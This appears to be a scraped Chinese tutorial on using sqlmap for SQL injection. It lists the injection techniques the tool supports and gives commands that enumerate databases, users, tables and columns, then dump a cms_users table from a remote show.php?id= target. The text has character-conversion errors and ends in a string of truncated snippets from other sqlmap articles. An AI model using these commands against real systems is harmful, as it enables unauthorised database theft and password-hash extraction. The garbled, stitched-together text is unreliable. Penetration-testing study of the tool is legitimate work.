sql注入攻擊是一種常用的攻擊**手段。受影響的**系統: asp+access、asp+sqlserver、php+mysql、php+apache等。
sqlmap是乙個開放原始碼的滲透測試工具,它可以自動探測和利用sql注入漏洞來接管資料庫伺服器。它配備了乙個強大的探測引擎,為最終滲透測試人員提供很多的功能,可以拖庫,可以訪問底層的檔案系統,還可以通過帶外連線執行作業系統上的命令。
sqlmap支援五種sql注入技術:
(1)基於布林值得注入,基於時間的盲注,基於錯誤的盲注,union查詢和stacked查詢;
(2)檢索dbms的會話使用者和資料庫;
(3)列舉使用者、雜湊口令、許可權和資料庫、表、列;
(4)自動識別後台賬戶的雜湊口令,並通過字典進行暴力破解;
sqlmap的基礎命令如下:
sqlmap -u 「注入位址」 -v 1 –-dbs
// 列舉資料庫
sqlmap -u 「注入位址」 -v 1 –-current-db
// 當前資料庫
sqlmap -u 「注入位址」 -v 1 –-users
// 列資料庫使用者
sqlmap -u 「注入位址」 -v 1 –-current-user
// 當前使用者
sqlmap -u 「注入位址」 -v 1 -d 「資料庫」 –-tables
// 列舉資料庫的表名
sqlmap.py -u 「注入位址」 -v 1 -t 「表名」 -d 「資料庫」 –-columns
// 獲取表的列名
sqlmap.py -u 「注入位址」 -v 1 -t 「表名」 -d 「資料庫」 -c 「字段」 –-dump
// 獲取表中的資料
第一步:使用sqlmap命令進行sql注入,獲取資料庫資訊
獲取資料庫
使用命令sqlmap -u http://遠端ip:8083/show.php?id=33 -d cms --tables 來獲取web伺服器上的cms資料庫中的表資訊(命令中「-d cms」的意思是指定獲取cms資料庫的表資訊)
使用命令sqlmap -u http://遠端ip:8083/show.php?id=33 -d cms -t cms_users --columns來獲取web伺服器上的cms資料庫中的cms_users表中的字段資訊(命令中「-d cms」的意思是指定獲取cms資料庫的表資訊,「-t cms_users"的意思是指定獲取表cms_users中的字段資訊)
使用命令sqlmap -u http://遠端ip:8083/show.php?id=33 -d cms -t cms_users --columns --dump 來獲取web伺服器上的cms資料庫中的cms_users表中字段的資料資訊
sqlmap的注入方式
第一種 普通的注入方式 第一步 首先進行 u操作,比如 u 第二步 進行 d暴庫操作 sqlmap u dbs 第三步 進行 t暴表操作 sqlmap u d user tables 第四步 進行 colums進行暴欄位 sqlmap u d user t use colums 第五步 進行 dum...
有關sqlmap的使用
首先貼一段詳細引數說明,相當於說明書了 sqlmap詳細命令 options 選項 target 目標 以下至少需要設定其中乙個選項,設定目標url。request 請求 這些選項可以用來指定如何連線到目標url。enumeration 列舉 這些選項可以用來列舉後端資料庫管理系統的資訊 表中的結構...
sqlmap的安裝教程
由於sqlmap是利用python語言寫的,所以需要將python這個語言環境給安裝上,以下是詳細安裝過程 準備工作 step2.python2.7.11安裝 2.2.預設,next 2.3.將 add python.exe to path 項勾選,勾選後安裝完成不再需要單獨新增環境變數,預設是 去...